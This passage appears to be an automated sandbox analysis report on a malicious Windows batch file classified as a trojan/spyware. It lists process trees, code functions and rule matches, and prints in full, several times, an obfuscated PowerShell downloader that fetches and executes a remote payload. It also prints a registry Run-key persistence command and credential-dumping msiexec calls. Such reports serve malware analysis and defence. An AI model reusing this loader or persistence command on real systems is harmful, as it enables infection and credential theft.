                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407AEB13_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044AA8013_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00412AA913_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404B7413_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404B0313_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044BBD813_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404BE513_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00404C7613_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00415CFE13_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00416D7213_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00446D3013_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00446D8B13_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00406E8F13_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040503814_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041208C14_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004050A914_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040511A14_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043C13A14_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004051AB14_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044930014_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040D32214_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044A4F014_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043A5AB14_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041363114_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044669014_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044A73014_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004398D814_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004498E014_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044A88614_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043DA0914_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00438D5E14_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00449ED014_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041FE8314_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00430F5414_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004050C216_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004014AB16_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040513316_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004051A416_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040124616_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040CA4616_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040523516_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004032C816_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040168916_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00402F6016_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6076
                Source: unknownProcess created: Commandline size = 6100
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6076Jump to behavior
                Source: amsi32_6504.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@22/13@3/3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,16_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,13_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,13_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Knighting.ProJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2748:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-G9FJB6
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c13zdzdo.t5y.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MARSS-FILTRY_ZW015010024.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3664
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6504
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 00000008.00000002.3306498912.0000000023CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000D.00000003.2621550336.0000000004A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-33236
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MARSS-FILTRY_ZW015010024.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. ds
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecl
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
